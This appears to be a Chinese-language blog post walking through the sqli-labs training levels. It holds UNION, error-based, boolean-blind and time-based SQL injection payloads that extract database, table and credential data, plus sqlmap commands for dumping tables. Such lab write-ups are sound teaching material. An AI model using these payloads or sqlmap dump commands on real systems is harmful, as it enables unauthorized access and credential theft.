



<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="Hexo" href="http://example.com/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="Hexo" href="http://example.com/atom.xml" />
<link rel="alternate" type="application/json" title="Hexo" href="http://example.com/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  

<link rel="canonical" href="http://example.com/2025/03/26/sql/">



  <title>
 |
Yume Shoka = Hexo</title>
<meta name="generator" content="Hexo 7.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">
  </h1>
  
<div class="meta">
  <span class="item" title="Created: 2025-03-26 13:29:05">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">Posted on</span>
    <time itemprop="dateCreated datePublished" datetime="2025-03-26T13:29:05+08:00">2025-03-26</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="Toggle navigation bar">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Yume Shoka</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclj61ylzj20zk0m8b29.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giph4fomxoj20zk0m8axp.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipeuibk9fj20zk0m8ay2.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclize41wj20zk0m87gk.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giph4lm9i7j20zk0m84qp.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclgi503lj20zk0m8hdt.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">Home</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="en">
  <link itemprop="mainEntityOfPage" href="http://example.com/2025/03/26/sql/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="John Doe">
    <meta itemprop="description" content=", ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Hexo">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="pass1"><a href="#pass1" class="headerlink" title="pass1"></a>pass1</h1><h3 id="1-1判断是否存在sql注入"><a href="#1-1判断是否存在sql注入" class="headerlink" title="1.1判断是否存在sql注入"></a>1.1判断是否存在sql注入</h3><p>**1.**提示你输入数字值的ID作为参数，我们输入?id&#x3D;1</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1707352947435-4df42dc9-012d-4d0f-9850-e15f6ebdaaa1.png" alt="img"></p>
<p>我们再输入?id&#x3D;2</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1707353069967-ca6d677a-fcb1-46ba-9f2a-35d376aac0c3.png" alt="img"></p>
<p>2.判断字段数</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1707353686407-a34a19bf-af54-415c-afea-8f9bd78ddcbc.png" alt="img"><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1707353717786-86d6a888-c01d-410f-bc63-f35988a98dae.png" alt="img"></p>
<p>判断字段数为3</p>
<p>3.判断显错位：?id&#x3D;10’union select 1, 2, 3 – q应用联合查询</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1707353899202-a96d5026-433d-4e87-8f1d-7124c60b8bf5.png" alt="img"></p>
<p>判断显错位为三</p>
<p>库名也知道了</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1707354027961-9c2a6961-74d4-4880-a0c8-98f73c53b434.png" alt="img"></p>
<p>库名为admin2</p>
<p>判断表名：</p>
<p>?id&#x3D;10’union select 1, table _name, 3 from<br>information_schema.tables where table_schema&#x3D;’admin2’ – q<img data-src="https://cdn.nlark.com/yuque/0/2024/jpeg/42406840/1707355037367-a66a91fd-c81b-4ea6-9204-e059b72659dd.jpeg" alt="img"></p>
<p>判断列名：</p>
<p>?id&#x3D;10’union select 1, column_name, 3 from<br>information_schema.columns where table_schema&#x3D;’admin2’ and<br>table name&#x3D;’emails’ – q</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1707355402464-89e0031d-a795-4484-bc81-2f519f737ea0.png" alt="img"><br>判断数据：?id&#x3D;10’union select 1, id, 3 from emails– q</p>
<p>爆字段名?id&#x3D;-1’union select 1,2,group_concat(column_name) from information_schema.columns where table_name&#x3D;’users’–+</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1707355488342-882e01c2-608e-4a53-9e12-a28d4ec6c4b6.png" alt="img"></p>
<p>通过上述操作可以得到两个敏感字段就是username和password,接下来我们就要得到该字段对应的内容。我自己加了一个id可以隔一下账户和密码。</p>
<p>?id&#x3D;-1’ union select 1,2,group_concat(username ,id , password) from users–+</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1707355593864-1f97a4d7-f4dc-467b-ac54-5250ffc101dc.png" alt="img"></p>
<h1 id="pass2"><a href="#pass2" class="headerlink" title="pass2"></a>pass2</h1><p>原理和pass1一模一样</p>
<h1 id="pass3"><a href="#pass3" class="headerlink" title="pass3"></a>pass3</h1><p>当我们在输入?id&#x3D;2’的时候看到页面报错信息。可推断sql语句是单引号字符型且有括号，所以我们需要闭合单引号且也要考虑括号。</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1707355729560-6a3de440-48db-4f27-8274-8da3dd41ae33.png" alt="img"></p>
<p>我们加上括号没有显示报错</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1707355831231-4dbb5b00-f41e-4d7b-8c90-59d305820ad1.png" alt="img"></p>
<p>我们判断报错语句之后剩下的sql注入就可以把pass1的语句改一下就好了</p>
<p>?id&#x3D;2’)–+</p>
<p>?id&#x3D;1’) order by 3–+</p>
<p>?id&#x3D;-1’) union select 1,2,3–+</p>
<p>?id&#x3D;-1’) union select 1,database(),version()–+</p>
<p>?id&#x3D;-1’) union select 1,2,group_table_name from information_schema.tables where table_schema&#x3D;’security’–+</p>
<p>?id&#x3D;-1’) union select 1,2,group_concat(column_name) from information_schema.columns where table_name&#x3D;’users’–+</p>
<p>?id&#x3D;-1’) union select 1,2,group_concat(username ,id , password) from users–+</p>
<h1 id="pass4"><a href="#pass4" class="headerlink" title="pass4"></a>pass4</h1><p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1707356462286-7fd715a9-af95-4c87-92b2-4dd28603d844.png" alt="img"></p>
<p>根据页面报错信息得知sql语句是双引号字符型且有括号，</p>
<p>按照前三关的注入方式一次注入不过要注意双引号和括号</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1707356553657-ecbbab34-de2f-4df6-a93f-cbf907e1b3d0.png" alt="img"></p>
<p>?id&#x3D;1”) order by 3–+</p>
<p>?id&#x3D;-1”) union select 1,2,3–+</p>
<p>?id&#x3D;-1”) union select 1,database(),version()–+</p>
<p>?id&#x3D;-1”) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&#x3D;’security’–+</p>
<p>?id&#x3D;-1”) union select 1,2,group_concat(column_name) from information_schema.columns where table_name&#x3D;’users’–+</p>
<p>?id&#x3D;-1”) union select 1,2,group_concat(username ,id , password) from users–+</p>
<p>剩下的和前面的一模一样。</p>
<h1 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h1><p>报错注入：</p>
<ol>
<li>extractvalue:</li>
</ol>
<p>extractvalue函数用于从XML文档中提取特定的值。它接受两个参数，第一个参数是要提取值的XML文档，第二个参数是XPath表达式，用于指定要提取的值的位置。该函数将返回符合XPath表达式的节点的值。</p>
<ol start="2">
<li>updatexml:</li>
</ol>
<p>updatexml函数用于更新XML文档中特定节点的值。它接受三个参数，第一个参数是要更新的XML文档，第二个参数是XPath表达式，用于指定要更新的节点的位置，第三个参数是新的节点值。该函数将返回更新后的XML文档。</p>
<ol start="3">
<li>floor:</li>
</ol>
<p>floor函数用于向下取整，将一个数值向下取整为最接近的整数。它接受一个参数，即要进行取整操作的数值，返回最接近的小于或等于该数值的整数。例如，floor(3.8)将返回3，floor(4.2)将返回4。</p>
<h1 id="pass5"><a href="#pass5" class="headerlink" title="pass5"></a>pass5</h1><p>那么我们可以来尝试查询一下数据库的列数</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">&#x27;  order by 3 --+</span></span><br><span class="line"><span class="string">?id=1&#x27;</span>  <span class="keyword">order</span> <span class="keyword">by</span> <span class="number">4</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1708513654613-f38ce91b-e0f9-4fe6-be13-3dbc50d602a7.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1708513685159-8d6512ba-0066-46ec-be4f-14df2652c588.png" alt="img"></p>
<p>可以看到列数是3列</p>
<p>可以看到这里我们无论怎么进行查询，结果都会显示You are in ………</p>
<p>但是当我们查询的字段多于3个后，页面会报错，这里就可以利用报错注入来进行：</p>
<p>1.<br>2. </p>
<p>?id&#x3D;1’ and extractvalue(1,concat(0x7e,(select database()),0x7e))–+</p>
<ol start="2">
<li>?id&#x3D;1’and updatexml(1,concat(0x7e,(select database()),0x7e),1)<em>–+</em></li>
</ol>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1708514100438-8fc5bee3-5d23-46f5-8682-e775fcb7d9fc.png" alt="img"></p>
<p>这里我们可以使用limit来限制查询个数，来一个一个查询，也可以使用group_concat时使用substr进行字符串截取 其中”1，32”控制截取的起始与结束位置：</p>
<p>and updatexml(1,(select concat(username,0x7e,password) from users limit 0,1),1) –+</p>
<p>and updatexml(1,(select substr((group_concat(username,0x7e,password)),1,32) from users),1) –</p>
<h1 id="pass6"><a href="#pass6" class="headerlink" title="pass6"></a>pass6</h1><p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1709034359864-8277d285-2600-4d74-854c-3fc01c9fb25c.png" alt="img"></p>
<p>不管是输入id&#x3D;1还是id&#x3D;1’都会出现you are in….</p>
<p>所以我们就要尝试闭合输入id&#x3D;1”<img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1709034496680-7811e9c3-f716-4c42-b2ee-3f612c7d976d.png" alt="img"></p>
<p>看起来可以<img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1709034876906-66e548b3-691d-44da-b569-b8e8e1cc09c1.png" alt="img"><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1709034897969-d05dc77a-06db-422a-8ea2-eeff7dc237ff.png" alt="img"></p>
<p>我们可以判断数据库的长度为7</p>
<ol>
<li><code>&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;?id=1&#39;and length((select database()))&gt;9--+&lt;/font&gt;</code>：通过判断数据库名的长度是否大于9来获取数据库名的长度。</li>
<li><code>&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;?id=1&#39;and ascii(substr((select database()),1,1))=115--+&lt;/font&gt;</code>：逐一判断数据库名的第一个字符的ASCII码是否为115，以此来确定第一个字符。</li>
<li><code>&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;?id=1&#39;and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))&gt;13--+&lt;/font&gt;</code>：判断所有表名字符的长度是否大于13。</li>
<li><code>&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;?id=1&#39;and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))&gt;99--+&lt;/font&gt;</code>：逐一判断表名的第一个字符的ASCII码是否大于99。</li>
<li><code>&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;?id=1&#39;and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#39;users&#39;))&gt;20--+&lt;/font&gt;</code>：判断所有字段名的长度是否大于20。</li>
<li><code>&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;?id=1&#39;and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#39;users&#39;),1,1))&gt;99--+&lt;/font&gt;</code>：逐一判断字段名的第一个字符的ASCII码是否大于99。</li>
<li><code>&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;?id=1&#39; and length((select group_concat(username,password) from users))&gt;109--+&lt;/font&gt;</code>：判断字段内容的长度是否大于109。</li>
<li><code>&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;?id=1&#39; and ascii(substr((select group_concat(username,password) from users),1,1))&gt;50--+&lt;/font&gt;</code>：逐一检测字段内容的第一个字符的ASCII码是否大于50。</li>
<li><code>&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;?id=1&#39; and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+&lt;/font&gt;</code>：利用updatexml函数来爆破数据库名，这里的0x7e代表波浪符号“~”。</li>
<li><code>&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;?id=1&#39; and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(table_name)),0x7e) from information_schema.tables where table_schema=&#39;security&#39;),0x7e),1) --+&lt;/font&gt;</code>：利用updatexml函数来爆破表名。</li>
<li><code>&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;?id=1&#39; and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema=&#39;security&#39; and table_name=&#39;users&#39;),0x7e),1) --+&lt;/font&gt;</code>：查询users表的列名。</li>
<li><code>&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;?id=1&#39; and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username)),0x7e) from users ),0x7e),1) --+&lt;/font&gt;</code>：查询username。</li>
</ol>
<p>我们就可以用以上语句进行注入</p>
<h1 id="pass7"><a href="#pass7" class="headerlink" title="pass7"></a>pass7</h1><p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1709036624533-917771a1-4081-4f66-b8dd-ffd23e7a130e.png" alt="img"><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1709036851090-4a7392d2-6974-45a2-b22a-0d8b93729806.png" alt="img"></p>
<p>当输入?id&#x3D;1’时显示报错</p>
<p>当我们输入?id&#x3D;1”时显示正常，所以我们可以断定参数id时单引号字符串。</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1709036915956-8b59acac-8bf6-4bbf-8f8a-fcbf22c9208f.png" alt="img"></p>
<p>当输入?id&#x3D;1’–+时报错，输入?id&#x3D;1’)–+依然报错，输入，发现页面显示正常所以我们就可以在第五关第六关的基础上将前面的?id…改为?id&#x3D;1’))</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1709038056550-c313ca34-fcc3-48f5-b246-3499b3282ee5.png" alt="img"></p>
<p>值正确的话返回You are in…. Use outfile……</p>
<p>错误的话返回You have an error in your SQL syntax</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1709039759988-37ae10b1-8156-4b9d-a16c-4ddf406d6db9.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1709039794832-a0b92e9e-dfc3-4964-a4a5-37f85f76316a.png" alt="img"></p>
<p>页面虽然报错，但是可以去Less7的根目录下查看，可以看到已经生成了一个1.txt文件</p>
<p>只要找对闭合方式就可以</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1709039988850-f5d9428c-3fef-49ce-a92a-2350a1a17183.png" alt="img"></p>
<h1 id="pass8"><a href="#pass8" class="headerlink" title="pass8"></a>pass8</h1><p>从源码看一下<img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1709041296955-d0163636-04db-4f65-b549-1218d5c0340c.png" alt="img"></p>
<p>很显然可以看到，虽然不会报错，但是可以通过正确回显和错误回显来返回页面数据的不同进行对比，正确为True,错误为False，因此这里可以利用布尔盲注来进行注入。</p>
<p>我们可以与pass5对照一下pass8与pass5一模一样</p>
<p>当order by语句后面接3时，页面回显正常，接4时，页面异常，因此这里的字段数为3</p>
<p>4.爆数据库名称</p>
<p>1’ and length(database())&gt;7–+ 页面正常</p>
<p>1’ and length(database())&gt;8–+ 页面异常</p>
<p>由此可以数据库名称长度为8</p>
<p>1’ and ascii(substr(database(),1,1))&gt;114–+ 页面正常</p>
<p>1’ and ascii(substr(database(),,1))&gt;115–+ 页面异常</p>
<p>将ascii码转换为字符串，由此可以得到数据库名称第一个字母为‘s’</p>
<p>1’ and ascii(substr(database(),2,1))&gt;100–+ 页面正常</p>
<p>1’ and ascii(substr(database(),2,1))&gt;101–+–+ 页面异常</p>
<p>通过ascii码转换，由此可以推出数据库的第二个字母为‘e’,依次类推，可以猜解出数据库名称‘security’</p>
<ol>
<li>爆表名</li>
</ol>
<p>首先判断表的个数：</p>
<p>构造判断语句：1’ and (select count(table_name) from information_schema.tables where table_schema&#x3D;’security’)&gt;3–+ 页面正常</p>
<p>构造判断语句：1’ and (select count(table_name) from information_schema.tables where table_schema&#x3D;’security’)&gt;4–+  页面异常</p>
<p>因此这里有4个表</p>
<p>判断第一张表的长度</p>
<p>1’ and length(substr((select table_name from information_schema.tables where table_schema&#x3D;’security’ limit 0,1),1))&gt;5–+ 页面正常</p>
<p>1’ and length(substr((select table_name from information_schema.tables where table_schema&#x3D;’security’ limit 0,1),1))&gt;6–+ 页面异常</p>
<p>1’ and ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;database() limit 0,1),1,1))&gt;100–+ 页面正常</p>
<p>1’ and ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;database() limit 0,1),1,1))&gt;101–+ 页面异常</p>
<p>ascii编码转换为字符为‘e’,因此第一张表的表名第一个字母为‘e’</p>
<p>1’ and ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;database() limit 0,1),2,1))&gt;108–+ 页面正常</p>
<p>1’ and ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;database() limit 0,1),2,1))&gt;109–+ 页面异常</p>
<p>ascii编码转换为字符为‘m’,因此第一张表的表名第二个字母为‘m’</p>
<p>第二张表表名查询构造语句：1’ and ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;database() limit 1,1),1,1))</p>
<p>后面的同样的操作，可以得到所有的表名信息，然后这里我们需要的是users表</p>
<p>6.获取列名</p>
<p>首先构造注入语句，判断users表中有多少列：</p>
<p>1’ and (select count(column_name) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;’users’)</p>
<p>得到users表的列数有三列，然后接下来开始猜解第一列列名：</p>
<p>构造语句：1’ and ascii(substr((select column_name from information_schema.columns where table_name&#x3D;’users’ limit 0,1),1,1))&gt;116–+ 页面回显正常</p>
<p>1’ and ascii(substr((select column_name from information_schema.columns where table_name&#x3D;’users’ limit 0,1),1,1))&gt;117–+ 页面回显异常</p>
<p>根据 ascii码转换得到第一个字符为‘u’,后面的查询语句只需修改limit的值即可，最后得到我们需要的username列和password列</p>
<p>7.获取字段详细信息</p>
<p>构造语句：1’ and ord(mid((select IFNULL(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))&gt;67–+ 页面回显正常</p>
<p>1’ and ord(mid((select IFNULL(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))&gt;68– + 页面回显异常</p>
<p>通过ascii码的转换，得到第一个用户名的第一个字母为‘D’</p>
<p>构造语句查询第二个字母，1’ and ord(mid((select IFNULL(cast(username as char),0x20) from security.users order by id limit 0,1),2,1))，得到第二个字母为‘u’,以此类推，最后得到第一个用户名‘Dumb’，然后通过修改limit的值可以查询后面的用户名信息</p>
<p>构造语句，查询第一个用户名对应的密码：1’ and ord(mid((select IFNULL(cast(username as char),0x20) from security.users order by password limit 0,1),1,1))&gt;96–+ 页面正常</p>
<p>1’ and ord(mid((select IFNULL(cast(username as char),0x20) from security.users order by password limit 0,1),1,1))&gt;97–+ 页面异常</p>
<p>通过ascii码的转换，</p>
<h1 id="pass9"><a href="#pass9" class="headerlink" title="pass9"></a>pass9</h1><p><img data-src="https://cdn.nlark.com/yuque/0/2024/png/42406840/1709041704574-a2f36fc7-d77f-4ff3-8f05-0aa5f531bc1e.png" alt="img"></p>
<p>这里不论闭合方式是什么页面回显都是You are in……,因此这里使用延时注入的方式</p>
<p>if(条件,A,B)，条件成立，则执行A，否则执行B</p>
<p>所以可以在pass8的基础上在语句后面加if(……..,1,sleep(5))……可引起替换这些语句</p>
<h1 id="SQLmap（常规）使用步骤"><a href="#SQLmap（常规）使用步骤" class="headerlink" title="SQLmap（常规）使用步骤"></a>SQLmap（常规）使用步骤</h1><p>1、检测「注入点」</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;sqlmap -u &#x27;http://xx/?id=1&#x27;&lt;/font&gt;</span><br></pre></td></tr></table></figure>

<p>2、查看所有「数据库」</p>
<blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;sqlmap -u &#x27;http://xx/?id=1&#x27; --dbs&lt;/font&gt;</span><br></pre></td></tr></table></figure></blockquote>
<p>3、查看当前使用的数据库</p>
<blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;sqlmap -u &#x27;http://xx/?id=1&#x27; --current-db&lt;/font&gt;</span><br></pre></td></tr></table></figure></blockquote>
<p>4、查看「数据表」</p>
<blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;sqlmap -u &#x27;http://xx/?id=1&#x27; -D &#x27;security&#x27; --tables&lt;/font&gt;</span><br></pre></td></tr></table></figure></blockquote>
<p>5、查看「字段」</p>
<blockquote>
<p>sqlmap -u ‘<span class="exturl" data-url="aHR0cDovL3h4Lz9pZD0x">http://xx/?id=1</span>‘ -D ‘security’ -T ‘users’ –tables</p>
</blockquote>
<p>6、查看「数据」</p>
<blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;sqlmap -u &#x27;http://xx/?id=1&#x27; -D &#x27;security&#x27; -T &#x27;users&#x27; --dump&lt;/font&gt;</span><br></pre></td></tr></table></figure></blockquote>
<p>指定数据库&#x2F;表&#x2F;字段</p>
<p>-D 指定目标「数据库」，单&#x2F;双引号包裹，常配合其他参数使用。</p>
<p>-T 指定目标「表」，单&#x2F;双引号包裹，常配合其他参数使用。</p>
<p>-C 指定目标「字段」，单&#x2F;双引号包裹，常配合其他参数使用。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;sqlmap -u &#x27;http://xx/?id=1&#x27; -D &#x27;security&#x27; -T &#x27;users&#x27; -C &#x27;username&#x27; --dump&lt;/font&gt;</span><br></pre></td></tr></table></figure>



<p>post请求<br>检测「post请求」的注入点，使用BP等工具「抓包」，将http请求内容保存到txt文件中。</p>
<p>-r 指定需要检测的文件，SQLmap会通过post请求方式检测目标。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;sqlmap -r bp.txt&lt;/font&gt;</span><br></pre></td></tr></table></figure>



<p>cookie注入<br>–cookie 指定cookie的值，单&#x2F;双引号包裹。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;sqlmap -u &quot;http://xx?id=x&quot; --cookie &#x27;cookie&#x27;&lt;/font&gt;</span><br></pre></td></tr></table></figure>



<p>脱库<br>获取所有内容</p>
<p><code>&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;sqlmap -u &#39;http://xx/?id=1&#39; -a &lt;/font&gt;</code><br>-a 就是 all 的意思，获取所有能获取的内容，会消耗很长时间。</p>
<p>–users 获取数据库的所有用户名。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;sqlmap -u &#x27;http://xx/?id=1&#x27; --users&lt;/font&gt;</span><br></pre></td></tr></table></figure>



<p>–privileges 查看每个数据库用户都有哪些权限。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;font style=&quot;color:rgb(77, 77, 77);&quot;&gt;sqlmap -u &#x27;http://192.168.31.180/sqli-labs-master/Less-1/?id=1&#x27; --privileges&lt;/font&gt;</span><br></pre></td></tr></table></figure>

  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">Edited on</span>
    <time title="Modified: 2025-03-26 13:39:10" itemprop="dateModified" datetime="2025-03-26T13:39:10+08:00">2025-03-26</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> Donate</button>
  <p>Give me a cup of [coffee]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="John Doe WeChat Pay">
        <p>WeChat Pay</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>Post author:  </strong>John Doe <i class="ic i-at"><em>@</em></i>Hexo
  </li>
  <li class="link">
    <strong>Post link: </strong>
    <a href="http://example.com/2025/03/26/sql/" title="">http://example.com/2025/03/26/sql/</a>
  </li>
  <li class="license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> unless stating additionally.
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2024/06/11/matlab%E7%BB%98%E5%9B%BE/" itemprop="url" rel="prev" data-background-image="&#x2F;.&#x2F;assets&#x2F;matlab%E7%BB%98%E5%9B%BE.jpg" title="&#39;matlab绘图&#39;">
  <span class="type">Previous Post</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>'matlab绘图'</h3>
  </a>

    </div>
